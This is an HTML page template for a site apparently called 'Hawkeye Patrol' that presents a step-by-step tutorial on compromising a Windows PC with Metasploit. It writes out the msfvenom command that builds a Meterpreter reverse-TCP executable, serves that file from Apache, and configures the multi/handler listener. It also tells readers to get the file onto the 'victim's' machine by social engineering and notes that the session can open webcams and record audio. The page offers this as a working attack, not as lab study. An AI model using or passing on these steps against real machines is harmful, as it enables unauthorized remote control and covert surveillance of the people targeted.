<!DOCTYPE html>
<html>
<head>
{% load static %}
	<title>Guide to Hacking Windows System</title>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
	<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lato">
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
body,h1,h2,h3,h4,h5,h6 {font-family: "Lato", sans-serif;}
body, html {
  height: 100%;
  color: #777;
  line-height: 1.8;
}

/* Create a Parallax Effect */
.bgimg-1 {
  background-attachment: fixed;
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
}

/* First image (Logo. Full height) */
.bgimg-1 {
  background-image: url('parallax1.png');
  min-height: 100%;
}

.w3-wide {letter-spacing: 10px;}
.w3-hover-opacity {cursor: pointer;}

/* Turn off parallax scrolling for tablets and phones */
@media only screen and (max-device-width: 1600px) {
  .bgimg-1 {
    background-attachment: scroll;
    min-height: 400px;
  }
}
</style>
</head>
<body>

<!-- Navbar (sit on top) -->
<div class="w3-top">
  <div class="w3-bar" id="myNavbar">
    <a class="w3-bar-item w3-button w3-hover-black w3-hide-medium w3-hide-large w3-right" href="javascript:void(0);" onclick="toggleFunction()" title="Toggle Navigation Menu">
      <i class="fa fa-bars"></i>
    </a>
    <a href="home" class="w3-bar-item w3-button">HOME</a>
    <a href="#about" class="w3-bar-item w3-button w3-hide-small"><i class="fa fa-user"></i> ABOUT</a>
    <a href="#blog" class="w3-bar-item w3-button w3-hide-small"><i class="fa fa-th"></i> BLOG</a>
    <a href="#contact" class="w3-bar-item w3-button w3-hide-small"><i class="fa fa-envelope"></i> CONTACT</a>
	<a href="services" class="w3-bar-item w3-button w3-hide-small"><i class=" fa fa-coffee"></i> SERVICES</a>
	<a href="welcome" class="w3-bar-item w3-button w3-hide-small w3-right "><i class="fa fa-user"></i> WELCOME</a>
    <a href="#" class="w3-bar-item w3-button w3-hide-small w3-right w3-hover-grey">
      <i class="fa fa-search"></i>
    </a>
  </div>

  <!-- Navbar on small screens -->
  <div id="navhome" class="w3-bar-block w3-white w3-hide w3-hide-large w3-hide-medium">
    <a href="#about" class="w3-bar-item w3-button" onclick="toggleFunction()">ABOUT</a>
    <a href="#blog" class="w3-bar-item w3-button" onclick="toggleFunction()">BLOG</a>
    <a href="#contact" class="w3-bar-item w3-button" onclick="toggleFunction()">CONTACT</a>
	<a href="#services" class="w3-bar-item w3-button" onclick="toggleFunction()">SERVICES</a>
    <a href="#" class="w3-bar-item w3-button">SEARCH</a>
  </div>
</div>

<!-- First Parallax Image with Logo Text -->
<div class="bgimg-1 w3-display-container w3-opacity-min" id="home">
<img src="{% static 'image/parallax1.png' %}" width=1200px height=500px>
  <div class="w3-display-middle" style="white-space:nowrap;">
    <span class="w3-center w3-padding-large w3-black w3-xlarge w3-wide w3-animate-opacity">HAWKEYE <span class="w3-hide-small"> PATROL</span>
  </div>
</div>

<!-- Container (About Section) -->
<div class="w3-content w3-container w3-padding-64" id="about">
  <h2 class="w3-center"><strong>Your Step-by-Step Guide to Hacking A Windows System Using Metasploit</strong></h2>
  <p class="w3-center"><img src="{% static 'image/metasploit.jpg' %}" class="w3-round w3-image w3-opacity w3-hover-opacity-off" alt="Metasploit" width="550" height="350"></p>
  <p>Before we start, let us first go through a few basic keywords that we'll require during the process!</p>
  <p><ul><li><strong> IP Address: </strong>Every device on the Internet has a unique address which is required for their identification, this is the IP Address.</li></ul></p>
  <p><ul><li><strong> Payload: </strong>This defines an action that will be performed after successful execution of an exploit.</li></ul></p>
  <p><ul><li><strong> Msfvenom: </strong>It is a command that we will use to generate a payload</li></ul></p>
  <p><ul><li><strong> LHOST: </strong>It is the IP Address of the attacking Kali Linux machine</li></ul></p>
  <p><ul><li><strong> LPORT: </strong>It is the listening port which is used to build a connection from the target.</li></ul></p>
    
  <br>
  <p>Great! Now that we've revised the basic keywords let us look into the pre-requisites</p>
 
      
       <h3 style="color: rgb(127, 86, 204)";> <strong>Requirements:</strong> </h3>
	   <ul><span>&#10003;</span> Kali Linux (Either on Virtual Box or VMWare)</ul>
       <ul><span>&#10003;</span> Victim’s Windows System</ul> 
       <ul><span>&#10003;</span> Metasploit Software (which will be pre-installed with Kali)</ul> 
       <ul><span>&#10003;</span> An Internet Access</ul> 
      
	  
	  
	  <p>Now that we have all the requisite knowledge and tools, let's dive into the main process.</p><br>
      
    
      <h3 style="color: rgb(127, 86, 204)"><strong>STEP 1:</strong></h3> 
        <p> Before we begin, we need to know the IP Address of our machine. To do that we open a terminal on Kali Linux and type the following command: <ul><li><strong> ifconfig</strong></li></ul></p>
      <p class =" w3-center"><img src="{% static 'image/w1.jpg' %}" alt="meta1" width="500" height="200" > </p>
	  <p>Here the IP Address for our machine where the interface is specified as <em>eth0</em> (as we are on Ethernet).</p>

      <h3 style="color: rgb(127, 86, 204)"><strong>STEP 2:</strong></h3> 
        <p> We run the following command in the terminal. <ul><li><strong> sudo msfvenom –p windows/meterpreter/reverse_tcp LHOST= 10.0.2.15 LPORT=4444 –f exe –o /var/www/html/file.exe </strong></li></ul></p>
      <p class =" w3-center"><img src="{% static 'image/w2.jpg' %}" alt="meta2" width="500" height="80" > </p>
	  <p>This command instructs msfvenom to generate a Windows executable file that performs a reverse TCP connection for the payload.  Here, <em>sudo</em> gives limited root privileges to user.</p>
      <ol><li> <strong> -p </strong>indicates it to be a payload.</li>
      <li> <strong> -f </strong>defines the format. Here it is a Windows executable with the .exe extension.</li>
      <li> <strong> -o </strong>is output. Here the command will create an output payload named file (which we’ve created in the server folder of Kali Linux)</li></ol><br>
      This generates the payload as shown:<br>
      <p class =" w3-center"><img src="{% static 'image/w3.jpg' %}" alt="meta3" width="500" height="90" > </p>


      <h3 style="color: rgb(127, 86, 204)"><strong>STEP 3:</strong></h3> 
        <p>Next we open the Metasploit Console using the command <ul><li><strong> msfconsole</strong></li></ul></p>
      <p class =" w3-center"><img src="{% static 'image/w4.jpg' %}" alt="meta4" width="500" height="300" > </p>
	  <p>We then type in the command <ul><li><strong>use exploit/multi/handler</strong></li></ul> This tells the Metasploit to use a generic payload handler </p>
      <p class =" w3-center"><img src="{% static 'image/w5.jpg' %}" alt="meta5" width="500" height="100" > </p>


      <h3 style="color: rgb(127, 86, 204)"><strong>STEP 4:</strong></h3> 
        <p> Now since we want to attack a Windows device, we type in the following. Here, Meterpreter is the name of the payload we generated.</p>
        <ol> <li><strong>set PAYLOAD windows/meterpreter/reverse_tcp</strong></li> This sets the PAYLOAD such that it matches with the one set in the executable.<br>
            <li>To set the LHOST we follow it up with,<strong> set LHOST 10.0.2.15</strong></li>
            <li><strong>set LPORT 4444</strong></li>This command sets the LPORT.
        
        
        </ol>
        After typing in the above commands, we get to see the following screen: 
      <p class =" w3-center"><img src="{% static 'image/w678.jpg' %}" alt="meta6" width="500" height="100" > </p><br>
      In order to check if we've entered all the commands correctly , we can type <ul><li><strong>show options</strong></li></ul>
      <p class =" w3-center"><img src="{% static 'image/wso.jpg' %}" alt="meta7" width="500" height="200" > </p><br>

      When all the settings have been checked, we type <strong>exploit</strong> in the console.
      <p class =" w3-center"><img src="{% static 'image/w9.jpg' %}" alt="meta1" width="500" height="100" > </p><br>

      <h3 style="color: rgb(127, 86, 204)"><strong>STEP 5:</strong></h3> 
        <p> We now need to start the server in Kali Linux. For that we type:<ul><li><strong> sudo service apache2 start</strong></li></ul></p>
      <p class =" w3-center"><img src="{% static 'image/w10.jpg' %}" alt="meta1" width="500" height="100" > </p>
	  <p>Now, through the use of Social Engineering we need to somehow deliver the payload file to the target PC. Here, we will be downloading it from the built-in server. For that, we type in our IP Address<em>10.0.2.15/</em> (as per our example)</p>
      
      <p class =" w3-center"><img src="{% static 'image/w11.jpg' %}" alt="meta1" width="500" height="100" > </p>
      We click on the link, and the file is downloaded. Upon execution of our file, we’ll see that a session has been opened. We are offered many options that can be performed on the PC.
      For example, we type <ul><li><strong>sysinfo</strong></li></ul>

      <p class =" w3-center"><img src="{% static 'image/w12.jpg' %}" alt="meta1" width="500" height="120" > </p><br>
      This particular command displays all the system information about the target PC. However, there are many other options that we can choose from. It has options that let us open webcams, close applications, record voice and many more.

      <br><br>

    </div>
  </div>
  
  
  
  <!-- Container (Blog Section) -->
  <div class="w3-content w3-container w3-padding-64" id="portfolio">
    <h3 class="w3-center">RELATED ARTICLES</h3>
    <p class="w3-left">
      <ul ><span>&#8618;</span><a href="androidguide"><em> Guide to accessing Android System using Metasploit </em></a></ul>
      <ul ><span>&#8618;</span><a href="linuxguide"><em> Guide to accessing Linux System using Metasploit </em></a></ul>
      
      
  </p>

<br><br>
<!-- Footer -->
<footer class="w3-center w3-black w3-padding-64 w3-opacity w3-hover-opacity-off">
  <a href="#windowsguide" class="w3-button w3-light-grey"><i class="fa fa-arrow-up w3-margin-right"></i>To the top</a>
  <div class="w3-xlarge w3-section">
    <i class="fa fa-facebook-official w3-hover-opacity"></i>
    <i class="fa fa-instagram w3-hover-opacity"></i>
    <i class="fa fa-snapchat w3-hover-opacity"></i>
    <i class="fa fa-pinterest-p w3-hover-opacity"></i>
    <i class="fa fa-twitter w3-hover-opacity"></i>
    <i class="fa fa-linkedin w3-hover-opacity"></i>
  </div>
  <p>Powered by <a href="#" title="hawkeye" target="_blank" class="w3-hover-text-grey">HAWKEYE PATROL</a></p>
</footer>
</html>